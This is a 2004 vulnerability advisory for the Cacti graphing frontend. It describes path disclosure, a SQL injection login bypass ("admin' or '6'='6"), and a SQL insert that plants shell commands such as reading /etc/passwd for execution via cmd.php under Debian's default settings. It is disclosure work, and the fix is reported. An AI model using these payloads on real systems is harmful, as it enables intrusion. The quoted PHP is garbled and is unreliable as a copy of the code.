/////////////////////////////////////////////////////
////            Vulnerable Program: CACTI
////
////            Version : The latest version 0.8.5a
////
////            Url: http://www.raxnet.net
////
////            The Bug: SQL injection to allows bypass the auth.
////
////            Date: Today, August 16 off 2004
////
////            Author: Fernando Quintero (a.k.a nonroot)
////             Email: nando@udea.edu.co


//////////////////////////////////////////////////////


I. Affected software description:

Cacti is a complete frontend to RRDTool, it stores all of the necessary
information to create graphs and populate them 
with data in a MySQL database. The frontend is completely PHP driven.
Along with being able to maintain Graphs, Data 
Sources, and Round Robin Archives in a database, cacti handles the data
gathering. There is also SNMP support for 
those used to creating traffic graphs with MRTG.

II. The BUgs


a) Full path disclosure

In several parts of the code when anyone try to open files in
directories who do not appear at first like: include, 
lib, scripts, etc. an error appears allowing to see the route him where
is installed the program. for example:

 http://127.0.0.1/cacti/include/auth.php
 http://127.0.0.1/cacti/auth_login.php?action=login
 http://127.0.0.1/cacti2/auth_changepassword.php?ref=index
php&action=changepassword&password=aaaaaa&confirm=aaaaaa&submit=Save

These are low risk bugs, but similarly they allow to obtain data of the
remote system to a possible attacker.


b) SQL injection and bypass the authentication.

Injection of code is possible in the index.php file to pass auth. When
the username and the password are evaluated by 
auth_login.php, anyone can insert this:

username = admin' or '6'='6
password = password wished 

Where 'admin' is a user worth in cacti, the system allows this input and
to change inmediatly the passowrd.
this is the code:

//auth_login.php
// line 33 ~

 switch ($_request["action" ])
 {marries 'login': / * --- UPDATE old password with new md5 password
value */

db_execute("update user_auth Seth password = '" . md5($_POST["password"
]) . "' where username='" . $_post["username" ] . "' and password =
PASSWORD (". $_POST["passw
ord"] . "')");

so, 'username' and 'password', can nevertheless be injected, this
nonserious possible if the variable 
'magic_quotes_gpc' it was to 'On' in the php.ini file of the system.

Here is where enters debian. I it probe in SID with the latest version
of cacti, When it's installed, a 
configuration file is created called cacti.conf in the route conf.d of
the apache. This file contains the
following information:

---BEGIN----

Alias /cacti /usr/share/cacti

<DirectoryMatch /usr/share/cacti/>
        Options +FollowSymLinks
        AllowOverride None
        order allow,deny
        allow from all
        <IfModule mod_php4.c>
                AddType application/x-httpd-php .php
                php_flag magic_quotes_gpc Off
                php_flag short_open_tag On
                php_flag register_globals On
                php_flag register_argc_argv On
                php_flag track_vars On
                php_value include_path .
                DirectoryIndex index.php
        </IfModule>
</DirectoryMatch>

-----END----

magic_quotes_gpc is put in Off in the line:

php_flag magic_quotes_gpc Off

Of this form everything is had what it is needed to carry out a
successful attack. Using this attack,
I would to inject some code in the table 'data_input_data_cache' and it
allowed me to execute a command in
the system with permissions of the user who runs the apache.

a possible example for this is:
insert into data_input_data_cache (local_data_id, host_id,
data_input_id, action, command, hostname, snmp_community, 
snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout,
rrd_name, rrd_path, rrd_num, arg1, arg2, arg3) 
values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some
script', '127.0.0.1', '', '1', '', '', '161', '500', 
'hack', '/', '3', 'NULL', 'NULL', 'NULL');

then points to http://127.0.0.1/cacti/cmd.php and the command will be
executed.

III. SOLUTION:

The coders where contacted and the code was fixed in the cvs ;).
The mantainer of cacti was contacted too.

IV. GREETINGS

    - Greets All the community. I learn of you!
    - Silence Team and the GIGAX Staff.


V. CONTACT

Fernando Quintero
nando@udea.edu.co
Silence Team


VI. FINAL WORDS

- Many applications would to be vulnerable with the configuration by
default of debian, check it!. 

- Sorry by the english, so  !! Viva COLOMBIA !!



Fernando Quintero
Silence Team
Colombia - South America